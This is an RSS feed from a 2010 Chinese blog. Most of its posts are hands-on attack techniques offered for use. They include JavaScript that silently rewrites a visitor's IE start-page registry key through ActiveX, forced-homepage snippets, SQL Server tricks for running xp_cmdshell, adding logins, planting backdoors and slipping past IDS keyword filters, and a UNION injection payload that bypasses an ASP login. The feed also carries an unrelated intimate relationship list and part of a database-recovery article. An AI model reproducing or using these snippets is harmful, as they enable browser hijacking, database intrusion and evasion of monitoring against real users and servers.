<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>颓废@tuifei.net</title>
	<atom:link href="http://www.tuifei.net/feed" rel="self" type="application/rss+xml" />
	<link>http://www.tuifei.net</link>
	<description></description>
	<lastBuildDate>Sat, 04 Sep 2010 15:45:41 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.8.5</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>强制将网址设为客户端IE首页JS代码</title>
		<link>http://www.tuifei.net/546.html</link>
		<comments>http://www.tuifei.net/546.html#comments</comments>
		<pubDate>Sat, 04 Sep 2010 15:45:41 +0000</pubDate>
		<dc:creator>颓废</dc:creator>
				<category><![CDATA[网络编程]]></category>
		<category><![CDATA[css]]></category>
		<category><![CDATA[html]]></category>
		<category><![CDATA[js]]></category>

		<guid isPermaLink="false">http://www.tuifei.net/?p=546</guid>
		<description><![CDATA[&#38;lt;script Language=Javascript&#38;gt;
&#38;lt;!&#8211;
var ucook=document.cookie;
var user=ucook.indexOF(&#38;quot;ilooki=&#38;quot;);
if(user==-1)
{
var nowTime=new Date();
document.cookie=&#38;quot;ilooki&#38;quot;+&#38;quot;;&#38;quot;+&#38;quot;... ]]></description>
			<content:encoded><![CDATA[<p>&amp;lt;script Language=Javascript&amp;gt;<br />
&amp;lt;!&#8211;<br />
var ucook=document.cookie;<br />
var user=ucook.indexOF(&amp;quot;ilooki=&amp;quot;);<br />
if(user==-1)<br />
{<br />
var nowTime=new Date();<br />
document.cookie=&amp;quot;ilooki&amp;quot;+&amp;quot;;&amp;quot;+&amp;quot;expires=Wednesday,03-Jan-&amp;quot;+eval(nowTime.getYear()+1903+&amp;quot;12:34:56 GMT&amp;quot;;<br />
document.write(&amp;quot;&amp;lt;APPLET HEIGHT=0WIDTH=0 code=com.ms.activeX.ActiveXCompoment&amp;gt;&amp;lt;/APPLET&amp;gt;&amp;quot;);function yuzi(){try{a1<br />
=document.applets[0];a1.setCLSID(&amp;quot;{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}&amp;quot;);a1.createInstance();Shl=a1.GetObject();a1.setCLSID(&amp;quot;{0D43FE01-F093-11CF-8940-00A0C9054228}&amp;quot;);try{Shl.RegWrite(&amp;quot;hkcu\Software\Microsoft\Internet Expiorer\Main\Start Page&amp;quot;http://www.你的网址.com);}catch(e){}}catch(e){}}setTimeout(&amp;quot;yuzi()&amp;quot;,1000);<br />
}<br />
&#8211;&amp;gt;<br />
&amp;lt;/script&amp;gt;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.tuifei.net/546.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>强制首页代码</title>
		<link>http://www.tuifei.net/544.html</link>
		<comments>http://www.tuifei.net/544.html#comments</comments>
		<pubDate>Sat, 04 Sep 2010 15:44:43 +0000</pubDate>
		<dc:creator>颓废</dc:creator>
				<category><![CDATA[it]]></category>
		<category><![CDATA[网络编程]]></category>

		<guid isPermaLink="false">http://www.tuifei.net/?p=544</guid>
		<description><![CDATA[强制首页代码
加入收藏夹,设为首页代码
把以下代码&#60;Body&#62;相应位置 
&#60;a target=_top href=javascript:window.external.AddFavorite(&#8217;www.darkvisitor.org&#8217;;,&#8217;黑暗访问者)&#62;加入收藏&#60;/a&#62;
&#60;a... ]]></description>
			<content:encoded><![CDATA[<p>强制首页代码<br />
加入收藏夹,设为首页代码<br />
把以下代码&lt;Body&gt;相应位置 <span id="more-544"></span><br />
&lt;a target=_top href=javascript:window.external.AddFavorite(&#8217;www.darkvisitor.org&#8217;;,&#8217;黑暗访问者)&gt;加入收藏&lt;/a&gt;<br />
&lt;a href=# onClick=&#8221;this.style.behavior=&#8217;url(#default#homepage)&#8217;;this.setHomePage(&#8217;www.darkvisitor.org);&#8221;&gt;设为首页&lt;/a&gt;</p>
<p>鼠标指向时提示设为首页<br />
将下列代码插入&lt;body&gt;区中：<br />
&lt;A href=www.darkvisitor.org onmouseover=&#8221;this.style.behavior=&#8217;url(#default#homepage)&#8217;;this.setHomePage(<a href="http://www.darkvisitor.org/">http://www.darkvisitor.org</a> <img src='http://www.tuifei.net/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> ;&#8221; target=&#8221;_blank&#8221;&gt;设为首页&lt;/A&gt;</p>
<p>打开页面时自动弹出窗口询问是否设为首页<br />
将以下代码放在&lt;head&gt;&lt;/head&gt;之间：<br />
&lt;script language=&#8221;javascript&#8221;&gt;<br />
function myhomepage(){<br />
this.homepage.style.behavior=&#8217;url(#default#homepage)&#8217;;this.homepage.sethomepage(&#8217;http://bbs.itjmz.com&#8217;;);<br />
}<br />
&lt;/script&gt;<br />
&lt;p align=&#8221;center&#8221;&gt;&lt;a href=&#8221;http:netbei.com&#8221; name=&#8221;homepage&#8221;<br />
onclick=&#8221;myhomepage();&#8221;&gt;&lt;/a&gt;<br />
再将下面代码加入&lt;body&gt;内：<br />
onload=&#8221;myhomepage();&#8221;<br />
即：&lt;body onload=&#8221;myhomepage();&#8221;&gt;<br />
离开时自动提示设为首页<br />
&lt;body onunload=&#8221;BASEBody.style.behavior=&#8217;url(#default#homepage)&#8217;;if(!(BASEBody.isHomePage(&#8217;http://bbs.itjmz.com&#8217;;)))BASEBody.setHomePage(&#8217;http://bbs.itjmz.com/&#8217;;);&#8221;&gt;<br />
强行设为首页代码<br />
&lt;object data=&#8217;http://www.darkvisitor.org/homepage/set.asp?url=http://你的网址;width=&#8217;0&#8242; height=&#8217;0&#8242;&gt;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.tuifei.net/544.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>她先醒来的结果，就是掀开被子，嘲笑我是个裸男</title>
		<link>http://www.tuifei.net/542.html</link>
		<comments>http://www.tuifei.net/542.html#comments</comments>
		<pubDate>Thu, 02 Sep 2010 10:33:31 +0000</pubDate>
		<dc:creator>颓废</dc:creator>
				<category><![CDATA[只是关于我]]></category>

		<guid isPermaLink="false">http://www.tuifei.net/?p=542</guid>
		<description><![CDATA[来源：猫扑
1．她的生日是小日本无条件投降日,典型的狮子座．
2．她身高165,她全家都是身高165．如果遇到劫匪,横着划一刀,全家一起弯腰能全躲过去．
3．她和我在一起时,下班周末都不穿高跟... ]]></description>
			<content:encoded><![CDATA[<p>来源：猫扑<br />
1．她的生日是小日本无条件投降日,典型的狮子座．<br />
2．她身高165,她全家都是身高165．如果遇到劫匪,横着划一刀,全家一起弯腰能全躲过去．<br />
3．她和我在一起时,下班周末都不穿高跟鞋．直到我有一天夸她穿高跟鞋很好看,她又开始穿了．<br />
4．她很喜欢吃辣,也能吃辣,而且还不长痘痘．所以她很喜欢吃我妈妈作的菜．我却喜欢吃她妈妈的菜,清淡．　　<br />
5．去看电影时,她总是在楼下的超市买好爆米花,用微波炉打好,放在包里带进去　　<br />
6．看电影中,我们总是不停的说话,无论再好再烂的片子,她总能从中找到笑点．即使是在身后人片片NB声中,我们依然如此．　　<br />
7．她有点小近视,看电影会戴上眼镜．我觉得眼镜太土,要给她买新的．她在店里拿起一副黑框,问我她像不像变态女教师？　　<br />
8．她是北方人,我是南方人．她特别喜欢北京,但也曾想与我一起去武汉生活,尽管武汉很热．　　<br />
9．我们总是一起坐地铁回家,有时候我们坐不到一起时,就隔着人群说话,被别人挡住了．她会发短信给我,说别人是讨厌的屏风．　　<br />
10．她不怎么爱干净,甚至不是每天洗澡．于是我每天督促她要洗澡．　<span id="more-542"></span>　<br />
11．她喜欢听苏打绿,张悬,陈绮贞．我也跟着她听,有一天她发现CC＊＊天气预告的背景乐是小情歌,高兴给出差的我打电话,说现在终于是80后的世界了．　　<br />
12．她喜欢我送她的CK香水,每天我都能闻到她身上的淡淡香水味道,习惯了我以为那就是她的味道．　　<br />
13．我送过她一盘苏打绿的小宇宙专辑．她一直没舍得拆开．后来我送她一块swatch的冰雪佳人,她要我退了,我说是我股票赚的钱,她才接受了．　　<br />
14．北四环的谭鱼头的大闸蟹火锅,是陪她去的最多的地方．她很爱吃,而且不顾吃相．我爱看她吃,我嫌吃起来麻烦．　　<br />
15．我每次约她时,她都很开心的答应了．我说你应该矜持点,因为你是美女．她说我就这样了,怎么办？　　<br />
16．我陪她去五道口的小店买衣服,一看到衣服,她就忘记了我的存在．忘情的试很多件,却只买一件,但她眼光确实很好,买的衣服都很好看．　　<br />
17．她喜欢ZARA,她爱穿ZARA的上面画着猫咪的短袖,所以直到现在我依然穿ZARA,并一直用着ZARA的背包．　　<br />
18．她喜欢的颜色非黑即白,并自豪说只要是黑色,她穿什么都好看．　　<br />
19．有一个周日,我带她去了我喜欢的一个地方,是餐厅和书吧的结合体．去的时候,老板的胖儿子,在楼下弹琴,她抢过来弹向我显摆她的水平．后来老板回来了,我点了B52,给她点了螺丝刀,于是借着酒精,我们确立关系了．　　<br />
20．她说北方的老家里太干,每个月都要在钢琴里放一杯水,琴才不会裂开．她还说,如果我们结婚,钢琴是她的嫁妆．无论多远,也要运过来．　　<br />
21．和朋友一起唱K时,她和我唱得最多就是周杰伦的＆lt;简单爱＆gt;,后来换成陶喆和蔡依林的＆lt;明天我要嫁给你＆gt;．　　<br />
22．有一次,我们去后海玩过,觉得不尽兴,于是又去我家附近的KTV唱K,结果发现关门．于是我给合租的哥们短信,让他别在家里了．于是那天我们邪恶的合体了．　　<br />
23．她喜欢穿我的睡裤,郁闷的是她穿长度正合适．　　<br />
24．她是唯一没嫌弃过我瘦的女人,我妈都觉得我太瘦．　　<br />
25．她看起来很干瘪,但了解她了,发现她其实是B罩杯．　　<br />
26．我合租,她和家人住．于是想在一起时,很不方便．出去开房时,她把北京的同学都利用了一遍．一个发给妈妈说谎,一个发给同学帮忙圆谎．　　<br />
27．她下班了会开MSN和我聊天,直到睡觉．她的MSN屏蔽了很多人,从上海的老外上司到追求者．　　<br />
28．无聊时,我们就玩MSN的动画表情,她下载了很多．我会用MSN的画笔,画出她的傻样子发给她．　　<br />
29．她爱熬夜,我也爱熬夜．但开房时,准备熬夜到天亮,结果都睡着了．　　<br />
30．如果我先醒来,我会仔细的看看睡眠中的她．她很安静．　　<br />
31．她先醒来的结果,就是掀开被子,嘲笑我是个裸男．　　<br />
32．坐长途车时,她会伏在前面的椅背上眯一会,因为她觉得她睡相很丑．　　<br />
32．08年她生日的时候,在必胜客庆祝的．我生日的时候,我们在青年旅舍开房,她买了冰淇淋,蛋糕胚．然后旅舍厨房作了冰淇淋蛋糕．吃完后,我拉了一天肚子．　　<br />
33．她喜欢宜家,会买些调料罐,花瓶．然后羡慕得看着家具,说以后我们以后要买这些．　　<br />
34．有一次XXOO中,她妈妈突然来电话．接完电话,她突然说如果妈妈知道我们这样,会不会杀了她．　　<br />
35．她觉得不能相信她父母也干过我们干的邪恶的事情．　　<br />
36．她带我去北京东四最地道的烤鸡翅店．店老板很牛,不搭理我们．她说北方人就这样,要不以后去南方？　　<br />
37．她能吃3个变态辣,同时喝一大瓶可乐．有一次我鼓起吃了一个变态,害得我想在北京城裸奔一圈．　　<br />
38．她小时候的照片都很可爱,高中短头发她很假小子．　　<br />
39．有一天,突然发现她家里相册中有一个巨丑的婴儿照片,长得像一个猥琐身边朋友．她死都不承认是她,后来一天晚上偷偷的告诉我就是她．　　<br />
40．她喜欢用手拨弄自己的头发来装可爱．　　<br />
41．她有痔疮,我给她涂药的时候两人的样子太邪恶了．　　<br />
42．她非常粗心,犯痔疮时,我会不让她吃辣,会把注意事项写在便签纸上,放在她包中．　　<br />
43．她早上起来刷牙,洗脸从不开灯．因为她觉得黑暗中她会好看点．狮子座有时候会很自卑．　　<br />
44．我们去过西单的一个陶吧,那天她穿着黑色的裙子．领口很大,邪恶的店员来教我们时,一个劲往里面瞄．　　<br />
45．她作了一个陶罐,我们用拇指和小指头印了一个胡蝶．烧制好后,她一直放在她的电脑桌上．　　<br />
46．我们去过猫眼皮萨店,要了红笔在墙壁上留下了我们的名字．　　<br />
47．我们一起请年假,去厦门．　　<br />
48．在晚班的飞机上,我们在后座上不停的亲亲摸摸,我忍不住要去洗手间XXOO,她死活都不敢去．　　<br />
49．我们住在鼓浪屿的青年旅舍,晚上穿着拖鞋,去市场买菜,回旅舍一起作菜．　　<br />
50．我在海滩上支起帐篷等日落,在用PSP听歌时,情不自禁的在帐篷里亲热了．　　<br />
51．她喜欢环绕鼓浪屿的钢琴声,我们去了岛上的钢琴博物馆．　　<br />
52．我们住在传说中娜雅,然后画了我们的头像,作了爱的见证,贴在那面墙上．　　<br />
53．她喜欢中亚与air夫妇,我也想与他们一样．　　<br />
54．我们租自行车逛了厦大的海滩,吃遍了厦门的小吃．　　<br />
55．我们利用周末坐绿皮车去坝上草原,我们拍下了日落,却错过了日出．　　<br />
56．她喜欢用手机拍照,嘲笑我用单反太沉．后来我买给她一款轻薄的奥林巴斯．她放在包里随身带着．　　<br />
57．我换电脑,买了macbook小白,借口太女了．于是换了她的惠普,因为我知道直接送她她会拒绝的．　　　<br />
58．她喜欢穿牛仔裤,因为她觉得胯太小了．　　<br />
59．她后来也开始买裙子穿,是因为我喜欢看女孩穿裙子．　　<br />
60．她有脚气,是被北京的姐姐家人传染的．每次开房,她都会把鞋子放在门口,怕臭着我了．　　<br />
61．她皮肤会很干,但我很喜欢,感觉很有质感．　　<br />
62．深夜,她会陪我一起去便利店买吃的喝的和套套．　　<br />
63．她有一次写工作报告拖到了最后一天,我在她家的麦当劳24小时店陪她作PPT．　　<br />
64．她经常被领导欺负,她给我打电话会哭诉工作上的事．　　<br />
65．她父母都在图书馆工作,她喜欢周末拉我去图书馆．　　<br />
66．她喜欢吃娃娃菜,用屈臣氏的卖的那种纸巾．　　<br />
67．每次买一件贵的衣服和鞋时,她都会耐心等很久,直到降价,幸运的买到最后一双．　　<br />
69．她有点小虚荣,穿的很多衣服的品牌我依然说不出来．　　<br />
70．她喜欢去秀水买假名牌．每次都受到我鄙视．她说,我只是喜欢样式,并不是因为它是牌子．　　<br />
71．她喜欢麦当劳甚于肯德基．我也是这样觉得,肯德基的鸡肉汉堡,总是觉得有一股鸡屎味．　　<br />
72．我们会一块去健身房,她去练习瑜伽,我去跑步,练器械．　　<br />
73．她爱作手工,在宜家买布,缝制在小盒子上,送给我,要我把它放在床边．　　<br />
74．吵架说不过我时,她会变得很激动,说她是个女孩子．　　<br />
75．我去总部开会回来时,下班后她会穿拖鞋,白色的麻布罩衫去机场等我．然后对我说,同事都嘲笑她穿睡衣去上班．　　<br />
76．听朋友讲述她们浪漫的恋爱故事后,她会埋怨我没有送她很多玫瑰花．我说太俗了．　　<br />
77．她陪着我去德胜门的一个广州饭店,吃烤生蚝,烤韭菜．后来她同学嘲笑她怎么尽吃壮阳的,她说陪男人吃的．　　<br />
78．她会说同事的坏话,尤其是学一个女性化的男同事,会激动得用上手势．　　<br />
79．她很健康,来例假时照吃冷饮．我想照顾她时,她说她自己没那么娇贵．　　<br />
80．有一次早上她突然难受,请假回到家,刚好那天她妈妈回老家了．我翘班给她煮完白粥,又赶紧回了公司．　　<br />
81．她跟妈妈说我作的白粥好吃,被妈妈骂白眼狼．　　<br />
82．她妈妈回老家的两个星期,我在她家住着,然后床上留下我的汗味．引起她妈妈的怀疑．<br />
83．她突然想学德语,然后学一两天,突然又想学日语,然后又坚持一两天．　　<br />
84．她不和我住时,爱早上洗头洗澡．　　<br />
85．她爱用日式的记事本,会把我们的约会记在上面,然后贴个可爱的图标．　　<br />
86．她有时候很奢侈,有时候很节俭．经常的结果是,花便宜的钱作个大妈的发型,第二天花很多钱,去改变发型．　　<br />
87．她只染过栗色的头发,她的头发也爱出油．　　<br />
88．她换个发型把额头露出来会更好看．　　<br />
89．我会帮她洗澡,她会奇怪说我像她爸爸．　　<br />
90．一起洗澡的时候,她会小邪恶勾引我到非常难受．　　<br />
91．她给我买了很多内裤,在屈臣氏,以及不知名的小店．　　<br />
92．她坚信世界是美好的,不相信我的那套世界观．　　<br />
93．公司遇到棘手问题时,总是跑到厕所打电话问我怎么办．　　<br />
94．她爱哭,很多时候是为了工作上的事．　　<br />
95．她爱笑,大部分是她在拼命讲笑话给我听．　　<br />
96．她没心没肺,会掐疼我．　　<br />
97．她知道我有时候会忧郁,但她觉得她的大神经能解救我．　　<br />
98．但我和她还是分手了．　　<br />
99．我依然想念她身上的香水味,穿她喜欢的ZARA,甚至又买了同样的电脑,为了与她继续凑一对．　　<br />
100．她的照片,依然在我手机卡中,只是一直未敢再打开</p>
]]></content:encoded>
			<wfw:commentRss>http://www.tuifei.net/542.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>SQL注入的小技巧</title>
		<link>http://www.tuifei.net/539.html</link>
		<comments>http://www.tuifei.net/539.html#comments</comments>
		<pubDate>Thu, 19 Aug 2010 13:55:11 +0000</pubDate>
		<dc:creator>颓废</dc:creator>
				<category><![CDATA[it]]></category>
		<category><![CDATA[sql]]></category>
		<category><![CDATA[数据库]]></category>
		<category><![CDATA[注入]]></category>

		<guid isPermaLink="false">http://www.tuifei.net/?p=539</guid>
		<description><![CDATA[1.关于Openrowset和Opendatasource
　　可能这个技巧早有人已经会了，就是利用openrowset发送本地命令。通常我们的用法是(包括MSDN的列子)如下：
　　select * from openrowset(&#8217;sqloledb&#8217;,'myserver&#8217;;&... ]]></description>
			<content:encoded><![CDATA[<p>1.关于Openrowset和Opendatasource</p>
<p>　　可能这个技巧早有人已经会了，就是利用openrowset发送本地命令。通常我们的用法是(包括MSDN的列子)如下：</p>
<p>　　select * from openrowset(&#8217;sqloledb&#8217;,'myserver&#8217;;&#8217;sa&#8217;;&#8221;,&#8217;select * from</p>
<p>　　table&#8217;)</p>
<p>　　可见(即使从字面意义上看)openrowset只是作为一个快捷的远程数据库访问，它必须跟在select后面，也就是说需要返回一个recordset 。</p>
<p>　　那么我们能不能利用它调用xp_cmdshell呢?答案是肯定的!</p>
<p>　　select * from openrowset(&#8217;sqloledb&#8217;,&#8217;server&#8217;;&#8217;sa&#8217;;&#8221;,&#8217;set fmtonly off</p>
<p>　　exec master.dbo.xp_cmdshel l &#8221;dir c:&#8221;&#8217;)</p>
<p>　　必须加上set fmtonly off用来屏蔽默认的只返回列信息的设置，这样xp_cmdshell返回的output集合就会提交给前面的select显示，如果采用默认设置，会返回空集合导致select出错，命令也就无法执行了。</p>
<p>　　那么如果我们要调用sp_addlogin呢，他不会像xp_cmdshell返回任何集合的，我们就不能再依靠fmtonly设置了，可以如下操作<span id="more-539"></span></p>
<p>　　select * from openrowset(&#8217;sqloledb&#8217;,&#8217;server&#8217;;&#8217;sa&#8217;;&#8221;,&#8217;select &#8221;OK!&#8221;</p>
<p>　　exec master.dbo.sp_addlogin Hectic&#8217;)</p>
<p>　　这样，命令至少会返回select OK!&#8217;的集合，你的机器商会显示OK!，同时对方的数据库内也会增加一个Hectic的账号，也就是说，我们利用</p>
<p>　　select &#8216;OK!&#8217;的返回集合欺骗了本地的select请求，是命令能够正常执行，通理sp_addsrvrolemember和opendatasource也可以如此操作!至于这个方法真正的用处，大家慢慢想吧。</p>
<p>　　2.关于Msdasql两次请求的问题</p>
<p>　　不知道大家有没有试过用msdasql连接远程数据库，当然这个api必须是sqlserver的管理员才可以调用，那么如下：</p>
<p>　　select * from openrowset(&#8217;msdasql&#8217;,'driver={sql</p>
<p>　　server};server=server;address=server,1433;uid=sa;pwd=;database=master;network=dbmssocn&#8217;,&#8217;s</p>
<p>　　elect * from table1 select * from table2&#8242;)</p>
<p>　　当table1和table2的字段数目不相同时，你会发现对方的sqlserver崩溃了，连本地连接都会失败，而系统资源占用一切正常，用pskill杀死 sqlserver进程后，如果不重启机器，sqlserver要么无法正常启动，要么时常出现非法操作，我也只是碰巧找到这个bug的，具体原因我还没有摸透，而且很奇怪的是这个现象只出现在msdasql上，sqloledb就没有这个问题，看来问题不是在于请求集合数目和返回集合数目不匹配上，应该还是msdasql本身的问题，具体原因，大家一起慢慢研究吧。</p>
<p>　　3.可怕的后门</p>
<p>　　以前在网上看到有人说在 sqlserver上留后门可以通过添加triger、jobs或改写sp_addlogin和sp_addsrvrolemember做到，这些方法当然可行，但是很容易会被发现。不知道大家有没有想过sqloledb的本地连接映射。呵呵，比如你在对方的sqlserver上用sqlserver的管理员账号执行如下的命令：</p>
<p>　　select * from openrowset(&#8217;sqloledb&#8217;,'trusted_connection=yes;data</p>
<p>　　source=Hectic&#8217;,&#8217;set fmtonly off exec master..xp_cmdshell &#8221;dir c:&#8221;&#8217;)</p>
<p>　　这样在对方的 sqlserver上建立了一个名为Hectic的本地连接映射，只要sqlserver不重启，这个映射会一直存在下去，至少我现在还不知道如何发现别人放置的连接映射，好了，以上的命令运行过后，你会发现哪怕是sqlserver没有任何权限的guest用户，运行以上这条命令也一样能通过!而且权限是 localsystem!(默认安装)呵呵!这个方法可以用来在以被<a href="http://hack.77169.com/List/List_45.html" target="_blank">入侵</a>过获得管理员权限的sqlserver上留下一个后门了。以上的方法在 sqlserver2000 sqlserver2000SP1上通过!</p>
<p>　　另外还有一个猜测，不知道大家有没有注意过windows默认附带的两个dsn，一个是localserver一个是msqi，这两个在建立的时候是本地管理员账号连接sqlserver的，如果对方的 sqlserver是通过自定义的power user启动，那么sa的权限就和power user一样，很难有所大作为，但是我们通过如下的命令：</p>
<p>　　select * from openrowset</p>
<p>　　(&#8217;msdasql&#8217;,'dsn=locaserver;trusted_connection=yes&#8217;,&#8217;set fmtonly off exec</p>
<p>　　master..xp_cmdshell &#8221;dir c:&#8221;&#8217;)</p>
<p>应该可以利用localserver的管理员账号连接本地sqlserver然后再以这个账号的权限执行本地命令了，这是后我想应该能突破sa那个power user权限了。现在的问题是sqloledb无法调用dsn连接，而msdasql非管理员不让调用，所以我现在正在寻找guest调用msdasql 的方法。</p>
<p>　　如果有人知道这个bug如何突破，或有新的想法，我们可以一起讨论一下，这个发放如果能成功被guest利用，将会是一个很严重的安全漏洞。因为我们前面提到的任何sql语句都可以提交给对方的asp去帮我们执行。</p>
<p>　　4.利用T-sql骗过Ids或攻击Ids</p>
<p>　　现在的ids已经变得越来越聪明了。有的ids加入了xp_cmdshell sp_addlogin 的监视，但是毕竟人工智能没有出现的今天，这种监视总是有种骗人的感觉。</p>
<p>　　先说说欺骗Ids</p>
<p>　　ids既然监视xp_cmdshell关键字，那么我们可以这么做：</p>
<p>　　declare @a sysname set @a=&#8221;xp_&#8221; &#8220;cmdshell&#8221; exec @a &#8216;dir c:&#8217;</p>
<p>　　这个代码相信大家都能看明白，还有xp_cmdshell作为一个store procedure在master库内有一个id号，固定的，我们也可以这么做：</p>
<p>　　假设这个id=988456</p>
<p>　　declare @a sysname select @a=name from sysobjects where id=988456</p>
<p>　　exec @a &#8216;dir c:&#8217;</p>
<p>　　当然也可以：</p>
<p>　　declare @a sysname select @a=name from sysobjects where id=988455 1</p>
<p>　　exec @a &#8216;dir c:&#8217;</p>
<p>　　这种做法排列组合，ids根本不可能做的到完全监视。同理，sp_addlogin也可以这么做。</p>
<p>　　再说说攻击Ids</p>
<p>　　因为ids数据量很大，日至通常备份到常规数据库，比如sql server。</p>
<p>　　如果用古老的recordset.addnew做法，会严重影响ids的性能，因为通过ado做t-sql请求，不但效率高，而且有一部分工作可以交给sql server 去做，通常程序会这么写：</p>
<p>　　insert table values (&#8217;日至内容&#8217;，&#8230;)</p>
<p>　　那么我们想想看，如果用 temp&#8217;) exec xp_cmdshell &#8216;dir c:&#8217; &#8212; 提交后会变成：</p>
<p>　　insert table values (&#8217;日至内容&#8217;&#8230;.&#8217;temp&#8217;) exec xp_cmdshell &#8216;dir</p>
<p>　　c:&#8217; &#8212; &#8216;)</p>
<p>　　这样，xp_cmdshell就可以在ids的数据库运行了。当然ids是一个嗅叹器，他会抓所有的报，而浏览器提交的时候会把空格变成 。因此， 会被提交到sql server，这样你的命令就无法执行了。 唯一的办法就是：</p>
<p>　　insert/**/table/**/values(&#8217;日至内容&#8217;&#8230;.&#8217;temp&#8217;)/**/exec/**/xp_cmdshell/**/&#8217;dir c:&#8217;/**/&#8211; &#8216;)</p>
<p>　　用/**/代替空格做间隔符，这样你的t-sql才能在ids的数据库内执行。当然也可以用其他语句，可以破坏，备份ids的数据库到你的共享目录，呵呵。</p>
<p>　　其实这种方法的原理和攻击asp是一样的，只是把空格变成了/**/ 。本来asp是select语句，那么用&#8217;就可以屏蔽。现在ids用insert语句，那么用&#8217;)屏蔽。</p>
<p>　　好了，其他很多新的入侵语句大家可以自己慢慢想，最好的测试工具就是query analyzer了。</p>
]]></content:encoded>
			<wfw:commentRss>http://www.tuifei.net/539.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>万能的登陆验证代码</title>
		<link>http://www.tuifei.net/536.html</link>
		<comments>http://www.tuifei.net/536.html#comments</comments>
		<pubDate>Thu, 19 Aug 2010 13:43:21 +0000</pubDate>
		<dc:creator>颓废</dc:creator>
				<category><![CDATA[it]]></category>
		<category><![CDATA[登陆]]></category>
		<category><![CDATA[登陆代码]]></category>

		<guid isPermaLink="false">http://www.tuifei.net/?p=536</guid>
		<description><![CDATA[最近有网友提到一种新的万能登陆密码。比如网上有很多这样的登陆验证代码： 
　　程序代码
　　&#60;%
　　username=trim(Request.Form(&#8221;username&#8221;))
　　password=trim(Request.Form(&#8221;password&#8221;))... ]]></description>
			<content:encoded><![CDATA[<p>最近有网友提到一种新的万能登陆密码。比如网上有很多这样的登陆验证代码： <span id="more-536"></span><br />
　　程序代码</p>
<p>　　&lt;%</p>
<p>　　username=trim(Request.Form(&#8221;username&#8221;))</p>
<p>　　password=trim(Request.Form(&#8221;password&#8221;))</p>
<p>　　sql=&#8221;Select * FROM admin Where user=&#8217;&#8221;&amp;username&amp;&#8221;&#8216;&#8221;</p>
<p>　　Set rs=Server.CreateObject(&#8221;adodb.recordset&#8221;)</p>
<p>　　rs.Open sql,conn,1,1</p>
<p>　　if rs.eof then</p>
<p>　　checksysUser=FALSE</p>
<p>　　else</p>
<p>　　passwd=trim(rs(&#8221;pwd&#8221;))</p>
<p>　　if passwd=password then</p>
<p>　　Session(&#8221;admin&#8221;)=username</p>
<p>　　checksysUser=TRUE</p>
<p>　　else</p>
<p>　　checksysUser=FALSE</p>
<p>　　end if</p>
<p>　　End if</p>
<p>　　rs.close</p>
<p>　　conn.close</p>
<p>　　if checksysUser=true then</p>
<p>　　Response.Redirect(&#8221;main.asp&#8221;)</p>
<p>　　else</p>
<p>　　errmsg=&#8221;&lt;font color=#FF0000&gt;&lt;b&gt;用户名输入有误，请重新输入！&lt;/b&gt;&lt;/font&gt;&#8221;</p>
<p>　　end if</p>
<p>　　%&gt;</p>
<p>　　先在数据库中查询用户名对应的密码，然后再和用户输入的密码对比，导致&#8217;or&#8217;='or&#8217;这样的万能登陆密码失效。</p>
<p>　　但如果在上面的程序中，用户名输入 程序代码</p>
<p>　　&#8217; UNION Select 1,1,1 FROM admin Where &#8221;=&#8217;</p>
<p>　　，密码输入1，就可以登陆成功，原理很简单，就不多说了。</p>
<p>　　顺便附上oldjun的语句：</p>
<p>　　程序代码</p>
<p>　　&#8217; UNION Select 1,1,1 AS pwd FROM admin Where &#8221;=&#8217;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.tuifei.net/536.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>如何修复崩溃的数据库</title>
		<link>http://www.tuifei.net/533.html</link>
		<comments>http://www.tuifei.net/533.html#comments</comments>
		<pubDate>Thu, 19 Aug 2010 13:36:37 +0000</pubDate>
		<dc:creator>颓废</dc:creator>
				<category><![CDATA[it]]></category>

		<guid isPermaLink="false">http://www.tuifei.net/?p=533</guid>
		<description><![CDATA[任何数据库系统都无法避免崩溃的状况，即使你使用了Clustered，双机热备……仍然无法完全根除系统中的单点故障，何况对于大部分用户来说，无法承受这样昂贵的硬件投资。所以，在系统崩... ]]></description>
			<content:encoded><![CDATA[<p>任何数据库系统都无法避免崩溃的状况，即使你使用了Clustered，双机热备……仍然无法完全根除系统中的单点故障，何况对于大部分用户来说，无法承受这样昂贵的硬件投资。所以，在系统崩溃的时候，如何恢复原有的宝贵数据就成为一个极其重要的问题了。</p>
<p>    在恢复的时候，最理想的情况就是你的数据文件和日志文件都完好无损了，这样只需要sp_attach_db，把数据文件附加到新的数据库上即可，或者在停机的时候把所有数据文件(一定要有master等)都copy到原有路径下也行，不过一般不推荐这样的做法，sp_attach_db比较好，虽然麻烦许多。<span id="more-533"></span></p>
<p>    但是呢，一般数据库崩溃的时候系统是未必能有时间把未完成的事务和脏页等写入磁盘的，这样的情况sp_attach_db就会失败。那么，寄期望于DBA制定了一个良好的灾难恢复计划吧。按照你的恢复计划，还原最新的完全备份，增量备份或者事务日志备份，然后如果你的活动事务日志还能读得出来的话，恭喜你!你可以还原到崩溃前的状态。</p>
<p>    一般的单位都是没有专职的DBA的，如果没有可用的备份，更可能是最近一次备份的时间过于久远而导致不可接受的数据损失，而且你的活动事务日志也处于不可用的状态，那就是最麻烦的情况了。</p>
<p>    不幸的很的是，一般数据库崩溃都是由于存储子系统引起的，而这样的情况是几乎不可能有可用的日志用于恢复的。</p>
